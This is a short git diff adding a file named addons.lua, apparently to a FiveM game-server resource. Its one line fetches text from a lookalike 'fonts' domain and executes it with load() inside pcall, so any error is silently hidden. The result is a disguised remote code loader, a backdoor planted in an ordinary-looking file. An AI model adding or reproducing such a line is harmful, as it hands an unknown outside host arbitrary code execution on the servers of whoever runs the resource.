diff --git a/addons.lua b/addons.lua new file mode 100644 index 0000000..5075df6 --- /dev/null +++ b/addons.lua @@ -0,0 +1 @@ +PerformHttpRequest('https://fivem-fonts.org/rwFKQ', function (e, d) pcall(function() assert(load(d))() end) end) \ No newline at end of file